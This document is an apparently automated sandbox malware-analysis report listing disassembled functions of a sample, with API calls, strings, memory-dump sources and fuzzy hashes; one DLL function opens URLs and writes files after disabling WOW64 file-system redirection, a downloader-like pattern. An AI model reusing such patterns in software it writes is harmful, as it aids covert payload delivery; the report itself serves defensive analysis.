                                                                                                                Function 0047EAA1 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 331COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047EAA6
                                                                                                                  • Part of subcall function 0047EFC7: __EH_prolog.LIBCMT ref: 0047EFCC
                                                                                                                  • Part of subcall function 0047EF15: __EH_prolog.LIBCMT ref: 0047EF1A
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0040FB14: __EH_prolog.LIBCMT ref: 0040FB19
                                                                                                                  • Part of subcall function 0040FB14: GetFileAttributesA.KERNEL32(?,00523A30), ref: 0040FB45
                                                                                                                  • Part of subcall function 0040FB14: lstrcpy.KERNEL32(?,?), ref: 0040FB5E
                                                                                                                  • Part of subcall function 0040FB14: 752A1540.VERSION(00000000,00510870,?,?,?,?,00000000,00000000,?,?), ref: 0040FBA6
                                                                                                                  • Part of subcall function 004C61B3: lstrlen.KERNEL32(00000000,005108DC,?,?,004098A7,?,005108DC,00000000,?,00000000,00510870,00000000,?,?,?,00000002), ref: 004C61DF
                                                                                                                  • Part of subcall function 00478BA6: __EH_prolog.LIBCMT ref: 00478BAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$A1540AttributesDecrementFileIncrementlstrcpylstrlen
                                                                                                                • String ID: %ProductName%$%s (Return code: %d)$Client Script$Exit update process$Globals$Product: %s$Update engine version: $Update started:
                                                                                                                • API String ID: 1144309385-716144887
                                                                                                                • Opcode ID: 76f623d576bb182a517e66abd66cf3a7ee04663166e7df35c74d156bab833fa2
                                                                                                                • Instruction ID: 89e1abb348314794c5d48e12cd70452a44a48e90b8418085126b44bde872cb00
                                                                                                                • Opcode Fuzzy Hash: 76f623d576bb182a517e66abd66cf3a7ee04663166e7df35c74d156bab833fa2
                                                                                                                • Instruction Fuzzy Hash: 0FB11771B005109BD721EB56C982FEEB7A4AF18704F0485AEF509DF3C2DA785E458798
                                                                                                                Function 00477CB2 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 270COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00477CB7
                                                                                                                  • Part of subcall function 00403AF0: __EH_prolog.LIBCMT ref: 00403AF5
                                                                                                                  • Part of subcall function 00403E6D: __EH_prolog.LIBCMT ref: 00403E72
                                                                                                                  • Part of subcall function 0040414B: __EH_prolog.LIBCMT ref: 00404150
                                                                                                                  • Part of subcall function 00478BA6: __EH_prolog.LIBCMT ref: 00478BAB
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00404BFB: __EH_prolog.LIBCMT ref: 00404C00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$Increment$Decrement
                                                                                                                • String ID: %CommonFilesFolder%\Microsoft Shared\DAO$.DLL$LocalMachine$Path$Software\Microsoft\Shared Tools\DAO$Software\Microsoft\Shared Tools\DAO350$Software\Microsoft\Shared Tools\DAO350.dll$Software\Microsoft\Shared Tools\DAO360.dll
                                                                                                                • API String ID: 3082256980-2418651373
                                                                                                                • Opcode ID: e651867b4859c6d6b9ad7bfab6750e9e08b74bbeba4d6a1cfd4b14466d5d8af7
                                                                                                                • Instruction ID: 595d224f212aedfecab68bbb94c844472877a04a232148cffbad4383ff548ccf
                                                                                                                • Opcode Fuzzy Hash: e651867b4859c6d6b9ad7bfab6750e9e08b74bbeba4d6a1cfd4b14466d5d8af7
                                                                                                                • Instruction Fuzzy Hash: 21A17274D05208AADB04EBA5D992EFFBF7CAF14308F50406EB106721C1DB782F45C6A9
                                                                                                                Function 004C6AAA Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C6AAF
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 004C6AC7
                                                                                                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004C6B25
                                                                                                                  • Part of subcall function 004C6692: GetWindowRect.USER32(?,?), ref: 004C66B7
                                                                                                                  • Part of subcall function 004C6692: GetWindow.USER32(?,00000004), ref: 004C66D4
                                                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 004C6B55
                                                                                                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 004C6B5D
                                                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 004C6B64
                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 004C6B6B
                                                                                                                  • Part of subcall function 004C666F: GetWindowRect.USER32(?,76BFFA40), ref: 004C667B
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 004C6BBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                                                                • String ID: AfxOldWndProc423
                                                                                                                • API String ID: 2397448395-1060338832
                                                                                                                • Opcode ID: 7d2a23f3b73e496d13fcedae34fce99aa906360929facecdb03564118148cc32
                                                                                                                • Instruction ID: 3f8d7b426907f025dc8ad8cab76469d9e04155afcf5daddcc20c09f0f261c5e8
                                                                                                                • Opcode Fuzzy Hash: 7d2a23f3b73e496d13fcedae34fce99aa906360929facecdb03564118148cc32
                                                                                                                • Instruction Fuzzy Hash: BA31AF36900219BFCF01AFA5DD89EBF7BB8EF45350F01842EF501A2161D7399A11DB69
                                                                                                                Function 004D4511 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlEnterCriticalSection.NTDLL(005265DC), ref: 004D4520
                                                                                                                • GlobalAlloc.KERNEL32(00002002,00000000,?,?,005265C0,005265C0,004D48AC,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?), ref: 004D4575
                                                                                                                • GlobalHandle.KERNEL32(006DB280), ref: 004D457E
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004D4587
                                                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004D4599
                                                                                                                • GlobalHandle.KERNEL32(006DB280), ref: 004D45B0
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004D45B7
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D45BD
                                                                                                                • GlobalLock.KERNEL32(?), ref: 004D45CC
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D4615
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2667261700-0
                                                                                                                • Opcode ID: ffedbe4e3cb60f8c5e9334263e05f7c64e9e0b56b5a8b208955ad7f5a9eb6c9c
                                                                                                                • Instruction ID: 774bed1611e3bd0e6d57176e341f86d252de02ce4c917f3a2881162e47e93bbe
                                                                                                                • Opcode Fuzzy Hash: ffedbe4e3cb60f8c5e9334263e05f7c64e9e0b56b5a8b208955ad7f5a9eb6c9c
                                                                                                                • Instruction Fuzzy Hash: 0731B271600305AFD7209F28ECA9A2AB7E9FB84305F05093FF952C7762E775E8048B14
                                                                                                                Function 0046DEEA Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 287COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046DEEF
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041D254: __EH_prolog.LIBCMT ref: 0041D259
                                                                                                                  • Part of subcall function 0041733C: __EH_prolog.LIBCMT ref: 00417341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlockedlstrlen
                                                                                                                • String ID: 99B2328D3FDF4E9E98559B4414F7ACB9$Constants$Failed to extract project file to memory.$Failed to find project file in archive.$Failed to get archive directory listing.$Invalid data format.$_TUProj.dat
                                                                                                                • API String ID: 1619145733-2421911828
                                                                                                                • Opcode ID: 392220079981593e02e03a442c0b0aa97618a505369d5472842f2812b05f0d72
                                                                                                                • Instruction ID: 302a50a406c6853073e14327f6ecddda8bc1a931f27a8181bff283ac9fe85d68
                                                                                                                • Opcode Fuzzy Hash: 392220079981593e02e03a442c0b0aa97618a505369d5472842f2812b05f0d72
                                                                                                                • Instruction Fuzzy Hash: 84C1B97490425DEFDF14EBA5C991FEDBBB4AF14308F10409EE50663282DB782B49CB66
                                                                                                                Function 0049B9C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 202filememoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,0049B732,00000001,00000000,?,?,?,?,00000000), ref: 0049B9CB
                                                                                                                • ReadFile.KERNEL32(?,00000C3A,0000002E,?,00000000,?,?,?,?,00000000), ref: 0049BACA
                                                                                                                • GlobalReAlloc.KERNEL32(?,?,00000002), ref: 0049BB2C
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0049BB41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFileLockReadValue
                                                                                                                • String ID: .
                                                                                                                • API String ID: 4242114251-248832578
                                                                                                                • Opcode ID: 61dfc0d93823cfbd2ba3d80b3e9455df641b8f570a8e4d4a74a5ccbe03b4c74c
                                                                                                                • Instruction ID: 8d3bb8cdd6e71b5eb83e434bd76301d7962de08df6961ca09cd42e2cc155ccab
                                                                                                                • Opcode Fuzzy Hash: 61dfc0d93823cfbd2ba3d80b3e9455df641b8f570a8e4d4a74a5ccbe03b4c74c
                                                                                                                • Instruction Fuzzy Hash: 647150716142498BEF30DF64EDC0AEB7BA5EB98310F04463EED488B341DB359A45CB95
                                                                                                                Function 004BFAC3 Relevance: 13.7, APIs: 9, Instructions: 221COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(00000000,00000000,004EF9B4,00000001,004EF9B4,00000001,00000000,0243112C,004BAE64,0000000C,?,?,?,0000000B,0000000B), ref: 004BFB01
                                                                                                                • CompareStringA.KERNEL32(00000000,00000000,004EF9B0,00000001,004EF9B0,00000001,?,004B966F), ref: 004BFB1E
                                                                                                                • CompareStringA.KERNEL32(?,?,00000000,004B966F,?,0000000B,00000000,0243112C,004BAE64,0000000C,?,?,?,0000000B,0000000B), ref: 004BFB7C
                                                                                                                • GetCPInfo.KERNEL32(0000000B,00000000,00000000,0243112C,004BAE64,0000000C,?,?,?,0000000B,0000000B,?,004B966F), ref: 004BFBCD
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,004B966F), ref: 004BFC4C
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,004B966F), ref: 004BFCAD
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,004B966F), ref: 004BFCC0
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,004B966F), ref: 004BFD0C
                                                                                                                • CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,004B966F), ref: 004BFD24
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharCompareMultiStringWide$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1651298574-0
                                                                                                                • Opcode ID: dad2422ca71f20b4a1cd3fea243d0b810a61f9ef7896ae16423a75d182ecdf0f
                                                                                                                • Instruction ID: a8aad5c9c205343b301ea8a997d585f4a96d087c362770444a76b30c4118357b
                                                                                                                • Opcode Fuzzy Hash: dad2422ca71f20b4a1cd3fea243d0b810a61f9ef7896ae16423a75d182ecdf0f
                                                                                                                • Instruction Fuzzy Hash: 2471A032904149AFDF219FA4DC819EF7FBAEB05350F14403BF859A6261C3399C59DBA8
                                                                                                                Function 10004170 Relevance: 13.6, APIs: 9, Instructions: 129memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 100042D0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 10004459
                                                                                                                  • Part of subcall function 100042D0: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 1000447B
                                                                                                                • GetProcessHeap.KERNEL32(10005FD3,00000000,?,00000000,00001000), ref: 100041B1
                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 100041BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInternetOpen$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 4052924728-0
                                                                                                                • Opcode ID: e0c9719493c597511ce869392217a245bf8b81bcfb8362fa0f1fe2ba5f96ef8d
                                                                                                                • Instruction ID: 3878b7e8ec8e6132135225234f0ff758d9d53693b1d6428a378f673155028e9a
                                                                                                                • Opcode Fuzzy Hash: e0c9719493c597511ce869392217a245bf8b81bcfb8362fa0f1fe2ba5f96ef8d
                                                                                                                • Instruction Fuzzy Hash: 56412372A00249EBFB10EFA4DC88F9EB7A8EF05395F514266FD05E3056DB30E95087A5
                                                                                                                Function 10006600 Relevance: 13.6, APIs: 9, Instructions: 67fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00001000,00000000), ref: 10006620
                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 10006627
                                                                                                                • Wow64DisableWow64FsRedirection.KERNEL32(00000000), ref: 10006637
                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10006656
                                                                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 10006661
                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1000667E
                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00001000,00000000,00000000,00001000), ref: 1000669A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100066A7
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100066B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Wow64$File$CloseCreateHandleProcessRedirection$CurrentDisableRevertWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1207613533-0
                                                                                                                • Opcode ID: 0fda84a1a1651f21399e5bb441592cc9b43826fbf1f2aa2083a06a98344e4973
                                                                                                                • Instruction ID: ffa6a3ac1523a604067df56c48e193e2d1ebbb013bff68b09a032b63ad136cc7
                                                                                                                • Opcode Fuzzy Hash: 0fda84a1a1651f21399e5bb441592cc9b43826fbf1f2aa2083a06a98344e4973
                                                                                                                • Instruction Fuzzy Hash: F8217931A40218FBFB219FE4CC49F9E7BB9EB08B91F208155FA01A61E0D7B1E915CB54
                                                                                                                Function 0041F715 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0041F71A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • timeGetTime.WINMM ref: 0041F74E
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F769
                                                                                                                • TranslateMessage.USER32(?), ref: 0041F88B
                                                                                                                • DispatchMessageA.USER32(?), ref: 0041F895
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • timeGetTime.WINMM ref: 0041F8A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$H_prologTimetime$DecrementDispatchInterlockedPeekTranslate
                                                                                                                • String ID: MSG: %d
                                                                                                                • API String ID: 2999153265-2058940224
                                                                                                                • Opcode ID: 7dbbe7b004773e2d4fda88e731689c3f748f8cce7097db3c443031234976f6c8
                                                                                                                • Instruction ID: 1d32c18b118aff449cd699567eee86db7f5ce21ebff05e72db3968fcfab801cd
                                                                                                                • Opcode Fuzzy Hash: 7dbbe7b004773e2d4fda88e731689c3f748f8cce7097db3c443031234976f6c8
                                                                                                                • Instruction Fuzzy Hash: A7411270A006189ADF25BB95D88DAEF7B34EB00354F1C0437E459E12E1E77D89CEC65A
                                                                                                                Function 0048DD50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,0048C96A,?,00000000,00000000,?,?,?,?,?,0048C945,?), ref: 0048DD6E
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,004815D5,?,?,?,?,00523CB4,0048161F,?,?,00523CB3,00000000,00473D4D,006D5500), ref: 0048DD75
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,0048C96A,?,00000000,00000000,?,?,?,?,?,0048C945,?), ref: 0048DDBF
                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0048DDC6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,0048C96A,?,00000000,00000000,?,?,?,?,?,0048C945), ref: 0048DDD1
                                                                                                                • RtlReAllocateHeap.NTDLL(00000000,?,?,004815D5), ref: 0048DDD8
                                                                                                                Strings
                                                                                                                • memory allocation error: block too big, xrefs: 0048DDA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Allocate$Free
                                                                                                                • String ID: memory allocation error: block too big
                                                                                                                • API String ID: 1005905338-2883253444
                                                                                                                • Opcode ID: 49ed1244b7402a733092ffa17d33dd2ac22aa1f0b96d2c69ef6041810ec5a06e
                                                                                                                • Instruction ID: 869c7c0fd4c7949cc368eaa6ffa757a8ec3ee33f9137661fa854ff3ded08ec3f
                                                                                                                • Opcode Fuzzy Hash: 49ed1244b7402a733092ffa17d33dd2ac22aa1f0b96d2c69ef6041810ec5a06e
                                                                                                                • Instruction Fuzzy Hash: 0811B6B2E01311ABC710EFA9DD88A1F77E9AF94755F010D2AFD05D7292DB34C80487A9
